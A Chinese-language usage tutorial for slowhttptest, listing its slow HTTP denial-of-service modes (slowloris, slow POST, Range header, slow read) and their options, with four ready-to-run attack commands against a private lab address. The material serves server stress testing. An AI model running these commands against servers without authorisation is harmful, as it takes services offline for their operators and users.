Slowhttptest使用教程
Slowhttptest使用教程
四大类
-H slowloris模式 (默认)
-B slow http post模式
-R Apache Range Header attack模式
-X slow read attack模式
报告选项
-g 输出保存统计数据并以slow_xxx.csv/html文件命名(xxx表示时间戳) (off)
-o file_prefix 自定义输出保存统计数据的文件名(需要-g参数)
-v level 输出日志详细度等级0-4: Fatal, Info, Error, Warning, Debug
常规选项
-c connections 目标连接数,最大不超过65539 (50)
-i seconds 在slowrois和Slow POST模式中,每个连接发送数据的时间间隔 (10s)
-l seconds 目标测试连接时长 (240s)
-r rate 每秒连接数 (50)
-s bytes slow post攻击模式下,Content-Length头的大小(默认4096字节)
-t verb 自定义请求动作, 默认slowloris使用GET,slow post使用POST
-u URL 指定目标url (http://localhost/)
-x bytes 在slowrois和Slow POST模式中,每次发送最大数据长度(32)
-f content-type Content-type头的值 (application/x-www-form-urlencoded)
探测/代理选项
-d host:port 所有流量指定HTTP代理 (off)
-e host:port 探测流量指定HTTP代理 (off)
-p seconds 设置探测连接http响应的超时时间,超过则认为服务器无法访问(5) -d host:port 所有流量指定HTTP代理 (off) -e host:port 探测流量指定HTTP代理 (off) -p seconds 设置探测连接http响应的超时时间,超过则认为服务器无法访问(5)
Range attack特殊选项
-a start ranges-specifier的起始值 (5)
-b bytes ranges-specifier的最大值 (2000)
Slow read特殊选项
-k num 如果服务器支持HTTP pipe-lining,则在同一连接中重复请求次数。(1)
-n seconds 从接收缓冲区读取操作的时间间隔 (1)
-w bytes 设置tcp window窗口大小的起始值 (1)
-y bytes 设置tcp window窗口大小的结束值 (512)
-z bytes 每次read()调用从接收缓冲区慢速读取的字节 (5)
slowloris
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.0.2 -x 24 -p 3
slow http post
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.0.2 -x 10 -p 3
slow read attack
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://192.168.0.2 -p 3 -g -o slow_read_stats
Apache Range Header attack
slowhttptest -R -u http://192.168.0.2 -t HEAD -c 65539 -a 10 -b 3000 -r 500 -g -o range_header_stats